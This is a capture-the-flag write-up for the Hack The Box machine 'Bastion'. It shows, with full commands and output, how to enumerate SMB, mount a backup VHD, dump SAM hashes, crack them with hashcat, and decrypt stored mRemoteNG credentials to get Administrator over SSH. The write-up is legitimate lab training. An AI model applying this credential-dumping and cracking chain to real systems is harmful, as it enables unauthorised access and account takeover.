Bastion - [HTB]

Marmeus


    Introduction

    Bastion is an easy Windows machine from Hack The Box where the attacker has to mount a VHD file available on the SMB service. Then, they have to crack the credentials stored in it in order to obtain the user flag. Finally, they have to find and decrypt the credentials saved by an installed piece of software, obtaining a shell as Administrator.

    Enumeration

    As always, let's start by finding all open ports on the machine with nmap.

    kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.134
    Warning: 10.10.10.134 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.10.134
    Host is up (0.041s latency).
    Not shown: 65522 closed ports
    PORT      STATE SERVICE
    22/tcp    open  ssh
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    5985/tcp  open  wsman
    47001/tcp open  winrm
    [...]
    # Nmap done at Mon Jul  5 11:24:03 2021 -- 1 IP address (1 host up) scanned in 82.59 seconds

    Then, we continue with a deeper scan of every open port, getting more information about each service.

    kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
    Nmap scan report for 10.10.10.134
    Host is up (0.052s latency).
    
    PORT      STATE SERVICE      VERSION
    22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
    |   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
    |_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
    135/tcp   open  msrpc        Microsoft Windows RPC
    139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
    [...]
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: -39m52s, deviation: 1h09m15s, median: 6s
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
    |   Computer name: Bastion
    |   NetBIOS computer name: BASTION\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2021-07-05T17:41:39+02:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2021-07-05T15:41:40
    |_  start_date: 2021-07-05T05:58:41
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Mon Jul  5 11:41:40 2021 -- 1 IP address (1 host up) scanned in 64.96 seconds

    Because there is an SMB service, let's enumerate its shares.

    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbmap -H 10.10.10.134 -u guest
    [+] IP: 10.10.10.134:445        Name: 10.10.10.134                                      
    [\] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\ZRVPGAGWIF, please remove manually
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            Backups                                                 READ, WRITE
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
    
    

    Looking inside the Backups share, there is a note warning us that we shouldn't download the entire share.

    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbclient  //10.10.10.134/Backups -N
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Mon Jul  5 12:33:05 2021
      ..                                  D        0  Mon Jul  5 12:33:05 2021
      nmap-test-file                      A      260  Mon Jul  5 12:00:49 2021
      note.txt                           AR      116  Tue Apr 16 06:10:09 2019
      SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
      WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019
    
                    7735807 blocks of size 4096. 2761155 blocks available
    smb: \> get note.txt 
    getting file \note.txt of size 116 as note.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion/smb$ cat note.txt 
    
    Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

    Searching inside the different folders, there is a heavy 5GB file named 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd. A VHD file is a file format that represents a virtual hard disk drive (HDD).

    smb: \> cd "WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351"
    smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
      .                                  Dn        0  Fri Feb 22 07:45:32 2019
      ..                                 Dn        0  Fri Feb 22 07:45:32 2019
      9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 07:44:03 2019
      9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 07:45:32 2019
      BackupSpecs.xml                    An     1186  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 07:45:32 2019
      cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 07:45:32 2019
    
                    7735807 blocks of size 4096. 2761155 blocks available
    smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

    Because we cannot download this file, we need to mount the network share locally instead. To do so, we execute the following commands.

    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mkdir /mnt/smb 
    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb/
    kali@kali:/mnt/smb$ ls
    nmap-test-file  note.txt  SDT65CB.tmp WindowsImageBackup
    

    Exploitation

    Now that we have access to the file, we can mount it using guestmount.

    kali@kali:/mnt/smb$ sudo apt-get install libguestfs-tools -y
    kali@kali:/mnt/smb$ sudo mkdir /mnt/vhd
    kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo guestmount --add  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
    kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo su
    root@kali:/mnt/vhd# ls
    '$Recycle.Bin'   config.sys                pagefile.sys   ProgramData      Recovery                     Users
     autoexec.bat   'Documents and Settings'   PerfLogs      'Program Files'  'System Volume Information'   Windows

    The virtual hard drive contains the SAM and SYSTEM registry hives, where the local user password hashes are stored. To extract them we use the tool samdump2.

    root@kali:/mnt/vhd/Windows/System32/config# samdump2 SYSTEM SAM  | tee /home/kali/Documents/HTB/Bastion/creds.txt
    *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

    Now hashcat can recover L4mpje's password from the NTLM hash.

    kali@kali:~/Documents/HTB/Bastion$ hashcat -m 1000 creds.txt /usr/share/wordlists/rockyou.txt                   
    hashcat (v6.1.1) starting...
    OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
    =============================================================================================================================                                      
    * Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
    Host memory required for this attack: 65 MB
    
    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14344385
    * Bytes.....: 139921507
    * Keyspace..: 14344385
    
    31d6cfe0d16ae931b73c59d7e0c089c0:                
    26112010952d963c8dc4217daec986d9:bureaulampje
    [...]

    These credentials can be used to become L4mpje through SSH.

    kali@kali:~/Documents/HTB/Bastion$ ssh L4mpje@10.10.10.134
    The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
    ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.                
    L4mpje@10.10.10.134's password: 
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    l4mpje@BASTION C:\Users\L4mpje>  

    Privilege Escalation

    Looking inside the machine's file system, an unusual program named mRemoteNG appears. mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol remote connections manager for Windows.

    l4mpje@BASTION C:\Program Files (x86)>dir                                                                           
     Volume in drive C has no label.
     Volume Serial Number is 0CB3-C487
     Directory of C:\Program Files (x86)
    22-02-2019  15:01    <DIR>          .                                                                               
    22-02-2019  15:01    <DIR>          ..             
    16-07-2016  15:23    <DIR>          Common Files
    23-02-2019  10:38    <DIR>          Internet Explorer
    16-07-2016  15:23    <DIR>          Microsoft.NET
    22-02-2019  15:01    <DIR>          mRemoteNG
    23-02-2019  11:22    <DIR>          Windows Defender
    23-02-2019  10:38    <DIR>          Windows Mail
    23-02-2019  11:22    <DIR>          Windows Media Player
    16-07-2016  15:23    <DIR>          Windows Multimedia Platform
    16-07-2016  15:23    <DIR>          Windows NT
    23-02-2019  11:22    <DIR>          Windows Photo Viewer
    16-07-2016  15:23    <DIR>          Windows Portable Devices
    16-07-2016  15:23    <DIR>          WindowsPowerShell
                   0 File(s)              0 bytes
                  14 Dir(s)  11.308.552.192 bytes free 

    Searching for where mRemoteNG stores its credentials, there is a post on Reddit explaining that they are kept at %appdata%\mRemoteNG\confCons.xml.

    l4mpje@BASTION C:\Program Files (x86)>type  %appdata%\mRemoteNG\confCons.xml  
    [...]      
    Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
    [...]
    Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"

    Although they are encrypted, we can decrypt them using mremoteng_decrypt.

    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
    --2021-07-05 14:55:13--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
    Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
    Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1535 (1.5K) [text/plain]
    Saving to: ‘mremoteng_decrypt.py’
    
    mremoteng_decrypt.py                     100%[=================================================================================>]   1.50K  --.-KB/s    in 0s
    
    2021-07-05 14:55:13 (3.12 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]
    
    kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
    Password: thXLHM96BeKL0ER2
    

    The Administrator's password can be used to access the machine as Administrator through SSH, getting the root flag.

    kali@kali:~/Documents/HTB/Bastion$ ssh Administrator@10.10.10.134
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.
    administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
    [CENSORED]

    Finally, if you want to unmount the folders under /mnt, execute the following commands.

    root@kali:~# umount /mnt/smb
    root@kali:~# guestunmount /mnt/vhd